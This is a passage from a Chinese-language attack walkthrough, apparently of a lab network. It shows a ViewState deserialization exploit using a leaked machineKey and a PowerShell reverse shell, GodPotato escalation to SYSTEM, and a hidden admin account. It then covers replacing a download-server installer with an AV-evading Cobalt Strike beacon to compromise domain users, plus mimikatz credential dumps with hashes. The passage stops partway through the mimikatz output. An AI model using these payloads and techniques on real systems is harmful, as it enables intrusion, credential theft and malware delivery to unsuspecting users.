07-04-25 09:58AM <DIR> WebDeploy
226 Transfer complete.
ftp> cd WebDeploy
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49773|)
125 Data connection already open; Transfer starting.
07-04-25 09:58AM <DIR> IntraFetch
226 Transfer complete.
ftp> cd IntraFetch
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49775|)
125 Data connection already open; Transfer starting.
07-04-25 09:58AM 3498 package.deploy-readme.txt
07-04-25 09:58AM 14441 package.deploy.cmd
07-04-25 09:58AM 446 package.SetParameters.xml
07-04-25 09:58AM 543 package.SourceManifest.xml
07-04-25 09:58AM 12105992 package.zip
226 Transfer complete.
ftp> get package.zip
local: package.zip remote: package.zip
229 Entering Extended Passive Mode (|||49781|)
125 Data connection already open; Transfer starting.
100% |******************************************************| 11822 KiB 689.97 KiB/s 00:00 ETA
226 Transfer complete.
12105992 bytes received in 00:17 (689.52 KiB/s)
ftp> exit
221 Goodbye.
在 WebDeploy\IntraFetch 目录下可以发现一个 package.zip,这就是网站的源码
5.3. 代码审计
对于 ASP.NET 的应用,最重要的就是看他的 Web.config 文件内容,里面有很多配置信息
在 Web.config 文件的第 62 行发现明文 machineKey 配置:
<machineKey decryption="AES"
decryptionKey="6424A8B2C8CE51FEFECBDBE795A8F33EBD81234CB655F610EEC49CFA13F89CC1"
validation="SHA1"
validationKey="1B7E26950A9C9ABFE4FE72FF25649D4DC4CA6286F3943D3ABB1B70AC6D81142D000CC3880E137C49954EF6284980381A2C674F785C13C960BDE13CB2595873FD"/>
说明: machineKey 用于加密/解密和验证 ViewState、Forms Authentication、会话状态等敏感数据。泄露该密钥可能导致攻击者伪造或篡改这些数据。
该应用使用了 ASP.NET Web Forms 的 ViewState 机制。ViewState 以隐藏字段 __VIEWSTATE 发送给客户端,在 POST 回发时进行反序列化。在已知 machineKey 的情况下,攻击者可:
- 解密现有 ViewState
- 构造包含恶意对象的 ViewState
- 使用已知密钥签名后提交,实现反序列化利用
相关文章: DotNet安全-ViewState反序列化利用 | 长亭百川云
Site.master 中的防护机制
在 Site.master.cs 中实现了多层防护:
这里设置 Page.ViewStateUserKey 后,ASP.NET 在生成 ViewState 的 MAC(消息认证码)时会加入该值。我们即使有 machineKey,但因为无法获取该用户特有的 Cookie,所以仍无法伪造有效的 ViewState。
此外,还有额外的 Anti-XSRF 令牌验证
在 ViewState 反序列化后(Page_PreLoad),会验证其中的
Anti-XSRF令牌和用户名。如果验证失败,那么即使伪造的 ViewState 通过了 MAC 校验也会被拒绝,这里其实是在反序列化后验证其数据的完整性
这里绝大多数的 .aspx 网页都引入了这个 Site.master 母版页
但有一个漏网之鱼,那就是 Download.aspx
可以看到其代码中没有设置 MasterPageFile 也就不会引入 Site.master 母版页, 因此也就不会执行 Site.master.cs 中的防护代码
这个 Download.aspx 就是我们反序列化的利用点
5.4. NET反序列化
使用:ysoserial.net生成反弹shell的payload
GitHub - pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters
首先在反弹shell生成器中弄一个powershell base64的payload
然后生成反序列的payload,这里需要注意 指定 --path 参数为 无反序列化攻击防护的 /Download.aspx
PS D:\tools\ysoserial_net> ./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAyADIALgAyADAALgAxADEAIgAsADkAOQA5ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --path="/Download.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="6424A8B2C8CE51FEFECBDBE795A8F33EBD81234CB655F610EEC49CFA13F89CC1" --validationalg="SHA1" --validationkey="1B7E26950A9C9ABFE4FE72FF25649D4DC4CA6286F3943D3ABB1B70AC6D81142D000CC3880E137C49954EF6284980381A2C674F785C13C960BDE13CB2595873FD"
HN4qiIWy4C2hO9AieD3JBv0w5vlgyIah8lb1eGbNQQMT%2FWRxgusmkIx9GlCXWm7q9gIUhVafMLZlncfJMAA49C1PGa1pXuNgCJvSDKqs62BYDN7dG987veFnWMVOcpNfk9ehTGZu1thELVaTlyoYan58Vh5OrYx0K50VkJ9ivtZrxQ2%2Bo9fPSk%2Bgoq8ExcsGPjOdbsaW2VpDjh%2BGLN%2FU6Pth4g2GeQmFzbvOrHG9i3Hl2hc8laOHoX44%2FUWAKrlsOz6JuN1Ib9Heg2HKHxx%2F9RGElCeLZNZqF6dpRlgnqJ%2FVRB6N5vGRA7UGXcznMADpdWyma5dRRE7HQXjhXuuFA2nsDvo6zgYjXhNO9PJj2f4mHnTK6AQ%2FF0YhqwjxtJ1FqDpZpBsjRQ69QDKP9WLY28Gnv3Uo6KJlxehqPsLNHWdCqDlB1VhHqwaIJ8mzbZgfXshoyVBwlHBF6WCxfAmVQn72EzVuWDOSqhdpTxbHqe%2F6sGkzrJdUXqfLGwDJ90LfwhtztPyVNAb9giJykE65bZjn4NhLkZgXgLRNFAnkeuG7ljgBwO%2FWEnrViK61w4vl%2FWnS3bSPRVacoSCp1bHkHDxslw3o3wIQM7j9CFlX%2Fb20RZG5RvLFAomzTZrsOLL9k56o20fLJlUpL3L5P6NaPXMzLmN9HGHOkiU%2B59uzY0JkQpmOt76vFSe2IdehwMQF3MKSAjU6mIIlWmzNU3P%2Fy3TnBIoblRe7uOde62T3gfTaKsYcK2zay9kmLF1r1HdaqgVyT2HiX%2FsCy4uWSQxhg348lfYPWJxAbdhJMX%2F0rLzAyYgezgRs4DT7Mt%2FNjgP0FzaX9roVsssgtloyWmBnloM%2B1WhmDzwMyaxw%2BULZNK5t5YXGD1jwlKQlG5p2kK%2Fto7D6FB91r6IyjmaMZckoFhJGXFzM8%2BhVJq%2Fa9YxOyhpzrSItInfr0RFiQh8E4GoQa5biLi%2FnOMdB5cC5u20ADZIFdb8rf4dff5V89aswMmQLYZrnaWu9uKmDf05YVmGrTvfWLqSM8SVrGjKhvaP0tTO0B1Tfij%2Bhlkoogphf03yZykHMgOxXX9exYB8pX5Rqkhiri%2B%2FJMBuAGnaukXOa7k8tXdEudrcCY66LYiSb23Lx4J8ACZJ3ZxfVkRCtZedE%2Bby4eHHjmnGs7VZviaXxXaw8VmaUL7ygB%2FCc1i8whvgMc33wCtmGxx6bebEWnZjDi8bVWovHamhRnuDXqcAeGGqxSguwleZBTvtwgBs8EaZqHlJ0jpPCHoVXHQh3iycRqKE91SbptHuQZXCsWOnz6Zsm8dMSeksVSu9tThgaApP8X%2FY7B%2FkEQNVDylho%2F5VDtKYhOo%2FIpCrARU3EiPebFvU6kk97iHquWee7Aof99fCMs3YsMn8queVwweLuVoHNLmpGTOZFmpBNvvmjmQUp5t0q%2Fbf5Er3DKRFJwBGy3BluLo0AIPI7L8o%2FzFor1M3m%2BBXkW00QbxtsOGB3BFj4yDHgjxk6GuP%2BqVDpW2pXFvgUis2YHWZPN169XsA5NzlfcvekgzmnJSi5iyoc6G0MyqkpWSJGAS%2Fzot7cY5Bhe7biKgKh57lnnA%2FMh9%2B84d2f1STZdOCOGeOzG16E3DbQlNuxIpy8cFhs5O2M0u%2BlxuBTVvPiWg5OhgyyADHNwuBjXhaFDEFMXYw6%2FOlVaeM2tzunNaz9ynFwkG3D0n42H9cDED4BFPQeEF6hdVWnTiRI1AG5jCX1IiYW9gBYHe67e5mRlimUxLarKQEUutuBGTmpT1f1H2BbGd6HqB4pFMcCJMqFYwIWBFTpHuTSOi0TXNWdxu9xre61%2B2ZB6SRI1fD876YSQuEunM2Vn6v2VvuifAbEf2JApQzVMIz78em13aHEpZPJtNKPiqu8XSocNxxJQbquutz8iCZA%2FQQqhgKul0xwmH6e26f8cno1i%2F75vzB%2FqxOQpD%2FSoc4hTZx7LM7%2FMIag%2B7Lf6DJ8R%2FnKyslPKjWped4US%2By2jwzx8YzyccXzoqOh0XNNizhHChgp9Go5OV%2FSB6AML%2FU%2Bn0I1JZaaW%2FUD7LPG%2BYi45MCOCPiFUSLrpKSQxUMY%2Fy8092r2OcLlyRa%2BCA0r5PkYEqJvOFafs2bhCbcBD9%2FftmPkXP1%2Fwu5hviqN%2Favs0QNe4%2F1FEcqEW85xc4%2BcNiYMLx5SbYGytz7QMj%2FHPYqvuIbaob06YiTmt1NaoCJlL0vjh0souyAuh3lo5HJZJGbK9j%2FLMCIrsEKElUX5lT7SJdpEvBnzghrSyz019AtbVbqR3CPFIQI0qNKrqoepYW0q99joVw%2Bl6fOuXjPqoTy4vyU0FbpQokfFAaZD6evBd4i84hiLLAsaybz5oNg2Wc8DV6vZdiMnTh3kvvHdl3Y9emtVdLXrwv%2Bzw87IIX%2Fhpr8CF0ChvYwhVcFy13VhNu8xZ0VYst18z%2BvKPqevBTpuhMGl6MlFC6rqmFpA7O5pmiVk0wT1Th6iDcB2reFIr9bFF9jSKne9MFOXXvWhpW1RzXvcWr%2FR4vwJOrAj7H3LaF1xQkMACDpZi9KfG4iDmNpnWU4QYqY8itNF3bXtLFjtqMIRjQY7FOwgYanzbIwnTBjSfF%2BbUp2%2BgE63UhcXlE%2B71LJxNKKn31cSGCGxz2pt4vOwtmUHWrHMmWv6pqI%2BfdRAa5wniBeBSEUFxUrqoUVVOA8X3QAphtvhdAwn733lmaFi%2Fcq%2B0jRGZLMAMdn6gC4vhPG0z95fsp82joA1Ko7QSiTua63Qh8cxhTzKtZmlWmS31cBiw0Ny31zGLj5ud2106FjPDx90LXSTKC9EOGBB1tFwqUfJHgfIhGZCPLBAjAebac0UKLfDjCHD0mLXAWBiHClKYH4uZ1IN%2Fmp3yQlRZPfEYEpCELmeSbkRYDZ25cKVhKQ0fdkPS2smEnZ2XlboWwNSuGQ8gGnCorWsIRgCOycfbesrauZnpQJ8z012MHfzeJlTuWvpu1UbZ48429IJVWkcTMYYU%2FYww63nD2LgYABzLvpWbqb59dIwLpUExLtbv1WXhjLUXNQAMvU4dK43BROnYKBYiN3XJjROUL0RWNrL0Auf9uww8g%3D%3D
然后先开启监听再访问 172.22.20.38/download 使用POST发包
__VIEWSTATE 作为参数,生成的payload作为值
下面是payload, 会反弹shell到 172.22.10.17:9999
__VIEWSTATE=HN4qiIWy4C2hO9AieD3JBv0w5vlgyIah8lb1eGbNQQMT%2FWRxgusmkIx9GlCXWm7q9gIUhVafMLZlncfJMAA49C1PGa1pXuNgCJvSDKqs62BYDN7dG987veFnWMVOcpNfk9ehTGZu1thELVaTlyoYan58Vh5OrYx0K50VkJ9ivtZrxQ2%2Bo9fPSk%2Bgoq8ExcsGPjOdbsaW2VpDjh%2BGLN%2FU6Pth4g2GeQmFzbvOrHG9i3Hl2hc8laOHoX44%2FUWAKrlsOz6JuN1Ib9Heg2HKHxx%2F9RGElCeLZNZqF6dpRlgnqJ%2FVRB6N5vGRA7UGXcznMADpdWyma5dRRE7HQXjhXuuFA2nsDvo6zgYjXhNO9PJj2f4mHnTK6AQ%2FF0YhqwjxtJ1FqDpZpBsjRQ69QDKP9WLY28Gnv3Uo6KJlxehqPsLNHWdCqDlB1VhHqwaIJ8mzbZgfXshoyVBwlHBF6WCxfAmVQn72EzVuWDOSqhdpTxbHqe%2F6sGkzrJdUXqfLGwDJ90LfwhtztPyVNAb9giJykE65bZjn4NhLkZgXgLRNFAnkeuG7ljgBwO%2FWEnrViK61w4vl%2FWnS3bSPRVacoSCp1bHkHDxslw3o3wIQM7j9CFlX%2Fb20RZG5RvLFAomzTZrsOLL9k56o20fLJlUpL3L5P6NaPXMzLmN9HGHOkiU%2B59uzY0JkQpmOt76vFSe2IdehwMQF3MKSAjU6mIIlWmzNU3P%2Fy3TnBIoblRe7uOde62T3gfTaKsYcK2zay9kmLF1r1HdaqgVyT2HiX%2FsCy4uWSQxhg348lfYPWJxAbdhJMX%2F0rLzAyYgezgRs4DT7Mt%2FNjgP0FzaX9roVsssgtloyWmBnloM%2B1WhmDzwMyaxw%2BULZNK5t5YXGD1jwlKQlG5p2kK%2Fto7D6FB91r6IyjmaMZckoFhJGXFzM8%2BhVJq%2Fa9YxOyhpzrSItInfr0RFiQh8E4GoQa5biLi%2FnOMdB5cC5u20ADZIFdb8rf4dff5V89aswMmQLYZrnaWu9uKmDf05YVmGrTvfWLqSM8SVrGjKhvaP0tTO0B1Tfij%2Bhlkoogphf03yZykHMgOxXX9exYB8pX5Rqkhiri%2B%2FJMBuAGnaukXOa7k8tXdEudrcCY66LYiSb23Lx4J8ACZJ3ZxfVkRCtZedE%2Bby4eHHjmnGs7VZviaXxXaw8VmaUL7ygB%2FCc1i8whvgMc33wCtmGxx6bebEWnZjDi8bVWovHamhRnuDXqcAeGGqxSguwleZBTvtwgBs8EaZqHlJ0jpPCHoVXHQh3iycRqKE91SbptHuQZXCsWOnz6Zsm8dMSeksVSu9tThgaApP8X%2FY7B%2FkEQNVDylho%2F5VDtKYhOo%2FIpCrARU3EiPebFvU6kk97iHquWee7Aof99fCMs3YsMn8queVwweLuVoHNLmpGTOZFmpBNvvmjmQUp5t0q%2Fbf5Er3DKRFJwBGy3BluLo0AIPI7L8o%2FzFor1M3m%2BBXkW00QbxtsOGB3BFj4yDHgjxk6GuP%2BqVDpW2pXFvgUis2YHWZPN169XsA5NzlfcvekgzmnJSi5iyoc6G0MyqkpWSJGAS%2Fzot7cY5Bhe7biKgKh57lnnA%2FMh9%2B84d2f1STZdOCOGeOzG16E3DbQlNuxIpy8cFhs5O2M0u%2BlxuBTVvPiWg5OhgyyADHNwuBjXhaFDEFMXYw6%2FOlVaeM2tzunNaz9ynFwkG3D0n42H9cDED4BFPQeEF6hdVWnTiRI1AG5jCX1IiYW9gBYHe67e5mRlimUxLarKQEUutuBGTmpT1f1H2BbGd6HqB4pFMcCJMqFYwIWBFTpHuTSOi0TXNWdxu9xre61%2B2ZB6SRI1fD876YSQuEunM2Vn6v2VvuifAbEf2JApQzVMIz78em13aHEpZPJtNKPiqu8XSocNxxJQbquutz8iCZA%2FQQqhgKul0xwmH6e26f8cno1i%2F75vzB%2FqxOQpD%2FSoc4hTZx7LM7%2FMIag%2B7Lf6DJ8R%2FnKyslPKjWped4US%2By2jwzx8YzyccXzoqOh0XNNizhHChgp9Go5OV%2FSB6AML%2FU%2Bn0I1JZaaW%2FUD7LPG%2BYi45MCOCPiFUSLrpKSQxUMY%2Fy8092r2OcLlyRa%2BCA0r5PkYEqJvOFafs2bhCbcBD9%2FftmPkXP1%2Fwu5hviqN%2Favs0QNe4%2F1FEcqEW85xc4%2BcNiYMLx5SbYGytz7QMj%2FHPYqvuIbaob06YiTmt1NaoCJlL0vjh0souyAuh3lo5HJZJGbK9j%2FLMCIrsEKElUX5lT7SJdpEvBnzghrSyz019AtbVbqR3CPFIQI0qNKrqoepYW0q99joVw%2Bl6fOuXjPqoTy4vyU0FbpQokfFAaZD6evBd4i84hiLLAsaybz5oNg2Wc8DV6vZdiMnTh3kvvHdl3Y9emtVdLXrwv%2Bzw87IIX%2Fhpr8CF0ChvYwhVcFy13VhNu8xZ0VYst18z%2BvKPqevBTpuhMGl6MlFC6rqmFpA7O5pmiVk0wT1Th6iDcB2reFIr9bFF9jSKne9MFOXXvWhpW1RzXvcWr%2FR4vwJOrAj7H3LaF1xQkMACDpZi9KfG4iDmNpnWU4QYqY8itNF3bXtLFjtqMIRjQY7FOwgYanzbIwnTBjSfF%2BbUp2%2BgE63UhcXlE%2B71LJxNKKn31cSGCGxz2pt4vOwtmUHWrHMmWv6pqI%2BfdRAa5wniBeBSEUFxUrqoUVVOA8X3QAphtvhdAwn733lmaFi%2Fcq%2B0jRGZLMAMdn6gC4vhPG0z95fsp82joA1Ko7QSiTua63Qh8cxhTzKtZmlWmS31cBiw0Ny31zGLj5ud2106FjPDx90LXSTKC9EOGBB1tFwqUfJHgfIhGZCPLBAjAebac0UKLfDjCHD0mLXAWBiHClKYH4uZ1IN%2Fmp3yQlRZPfEYEpCELmeSbkRYDZ25cKVhKQ0fdkPS2smEnZ2XlboWwNSuGQ8gGnCorWsIRgCOycfbesrauZnpQJ8z012MHfzeJlTuWvpu1UbZ48429IJVWkcTMYYU%2FYww63nD2LgYABzLvpWbqb59dIwLpUExLtbv1WXhjLUXNQAMvU4dK43BROnYKBYiN3XJjROUL0RWNrL0Auf9uww8g%3D%3D
成功获取到shell
5.5. 土豆提权
查看当前用户权限发现有SeImpersonatePrivilege这个权限,这里直接用Godpotato提权到system
GitHub - BeichenDream/GodPotato
PS C:\users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
首先在Ollama机器上传你下载好的 GodPotato-NET4.exe ,然后开启一个python服务器
root@Ollama :~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
然后在iis机器反弹的shell中执行下面的命令下载文件(需要先切换到一个有写入权限的目录 如 c:\users\public)
PS C:\users\public> certutil -f -split -urlcache http://172.22.20.11:80/GodPotato-NET4.exe
**** ?? ****
0000 ...
e000
CertUtil: -URLCache ???????
下载好后可以即可以system权限执行命令
PS C:\users\public> ./GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140710481690624
[*] DispatchTable: 0x140710484277576
[*] UseProtseqFunction: 0x140710483570880
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\a633439e-1ba0-4b6b-a7ab-ab019ab9d5db\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009802-1310-ffff-4356-c4d312ef7816
[*] DCOM obj OXID: 0x3c6f5a43700a3f45
[*] DCOM obj OID: 0x7da3352dee4bc3ae
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 852 Token:0x784 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1072
nt authority\system
然后创建一个本地管理员用户,方便我们直接rdp上去
PS C:\users\public> ./GodPotato-NET4.exe -cmd "cmd /c net user c1trus Admin123 /add && net localgroup administrators c1trus /add"
[*] CombaseModule: 0x140710481690624
[*] DispatchTable: 0x140710484277576
[*] UseProtseqFunction: 0x140710483570880
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\6809a09c-2889-4890-8986-92b263b0ff4f\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003402-08a8-ffff-c9ca-67a62fed70e4
[*] DCOM obj OXID: 0x85471666e10490a3
[*] DCOM obj OID: 0x1f14e15b496bcc0b
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 852 Token:0x784 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3668
???????
???????
PS C:\users\public> net users
\\FPSRVIIS03 ?????
-------------------------------------------------------------------------------
Administrator c1trus DefaultAccount
Guest WDAGUtilityAccount WDeployAdmin
WDeployConfigWriter
???????
使用 c1trus Admin123 rdp连接上来
5.6. 水坑免杀钓鱼
进来后在管理员桌面可以找到flag和下一步的提示,
查看这个word文档,可以发现通知域内用户访问内网下载系统 IntraFetch ,下载新版 Visual Studio
这个 IntraFetch 网站就是我们这台机器部署的,在且在 C:\Tools\ 目录下可以看到提供的相关下载资源。 从网站源码也可以证明网站下载的资源对应所在的目录就是 C:\Tools\
此外在目录 C:\inetpub\logs\LogFiles\W3SVC2 下也可以发现IIS的日志中有一个域机器(172.22.20.165)上的一个机器人每隔2分钟就会请求当前网站的 /Download file=VisualStudioSetup.exe 这个url,也就是下载 VisualStudioSetup.exe
此外这里你还可以发现 C:\Tools\ 目录下是有火绒安装包的,这里可以合理猜测机器上可能有杀软,
5.7. 上线CS
因为目标环境是不出网的,所以这里只能通过正向连接的方式进行上线,且还需要用到你的本机做一个跳板,
首先打开你的CS,然后先生成一个后门到本地,然后运行让你的本机上线
在生成一个Bind 的正向后门,上传到 172.22.20.38 IIS服务器 就是这台我们RDP上去的机器,然后运行
在CS使用我们的本机的beacon执行命令 connect 172.22.20.38 12345,即可上线 172.22.20.38,
然后利用 172.22.20.38 的beacon做一个代理上线,生成一个revsese的 payload.bin
打开网站掩日-Evasion as a Service 上传你的 payload.bin 这里选择免费的数字1即可生成帮你生成出一个免杀马,(当然你有自己的免杀方式用自己的也行)
然后将生成好的exe文件重命名为 VisualStudioSetup.exe,然后替换掉 C:\Tools\ 目录下的 VisualStudioSetup.exe ,等待一会即可上线
5.8. Bloodhound
在进行对下一台机器的横向之前,我们也可以先用SharpHound收集一下域内信息,然后用bloodhound进行分析
收集域内信息,需要能与域控进行通信,我们需要先提升到system权限,
上传psexec.exe从管理员提升到system权限
PsExec - Sysinternals | Microsoft Learn
psexec.exe -i -s cmd.exe #打开一个system权限的cmd .exe
然后上传sharphound.exe ,并用system权限的cmd.exe运行他收集域内信息
GitHub - SpecterOps/SharpHound: C# Data Collector for BloodHound
PS C:\users\public> ./SharpHound.exe -c all
2025-11-09T02:57:17.2220289+08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
...<SNIP>...
1 name to SID mappings.
3 machine sid mappings.
3 sid to domain mappings.
0 global catalog mappings.
2025-11-09T02:57:23.0500191+08:00|INFORMATION|SharpHound Enumeration Completed at 2:57 on 2025/11/9! Happy Graphing!
然后用bloodhound对域内攻击路径进行分析
GitHub - SpecterOps/BloodHound: Six Degrees of Domain Admin
很容易就可以发现 LIU654 这个用户很有价值
如果我们可以获取到 LIU654 这个用户的凭证,那么就基本结束了
这里我们还可以上传mimikatz.exe 抓一下当前机器上的哈希和明文密码
GitHub - gentilkiwi/mimikatz: A little tool to play with Windows security
C:\Users\Administrator\Desktop> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1527143 (00000000:00174d67)
Session : RemoteInteractive from 2
User Name : c1trus
Domain : FPSRVIIS03
Logon Server : FPSRVIIS03
Logon Time : 2025/11/9 2:45:35
SID : S-1-5-21-968187407-3797406681-3416851469-1002
msv :
[00000003] Primary
* Username : c1trus
* Domain : FPSRVIIS03
* NTLM : e45a314c664d40a227f9540121d1a29d
* SHA1 : 68d2cbb7f15aec345fbf42a6326ddfee03e61708
* DPAPI : 68d2cbb7f15aec345fbf42a6326ddfee
tspkg :
wdigest :
* Username : c1trus
* Domain : FPSRVIIS03
* Password : (null)
kerberos :
* Username : c1trus
* Domain : FPSRVIIS03
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 1526996 (00000000:00174cd4)
Session : RemoteInteractive from 2
User Name : c1trus
Domain : FPSRVIIS03
Logon Server : FPSRVIIS03
Logon Time : 2025/11/9 2:45:35
SID : S-1-5-21-968187407-3797406681-3416851469-1002
msv :
[00000003] Primary
* Username : c1trus
* Domain : FPSRVIIS03
* NTLM : e45a314c664d40a227f9540121d1a29d
* SHA1 : 68d2cbb7f15aec345fbf42a6326ddfee03e61708
* DPAPI : 68d2cbb7f15aec345fbf42a6326ddfee
tspkg :
wdigest :
* Username : c1trus
* Domain : FPSRVIIS03
* Password : (null)
kerberos :
* Username : c1trus
* Domain : FPSRVIIS03
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 53652 (00000000:0000d194)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/9 1:44:32
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : e7a5bbbec82b57fd5b325ea667ede2ec
* SHA1 : 5f83a7d3fc5110dc43c8531488218ea38ee3604d
* DPAPI : 5f83a7d3fc5110dc43c8531488218ea3
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : U[/D2d/_K4.XamwHCA'O5gAN\UNu#]xlUC #WmL1Oz5iir (D;? 8sQ@s2wF ()rS4XwL]kG-<QHb!.DF2WK'(bu6XG0<48R&xewHuf[\V_9TRvHypkjJpmKZnY,
ssp :
credman :
cloudap :
Authentication Id : 0 ; 53634 (00000000:0000d182)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/9 1:44:32
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 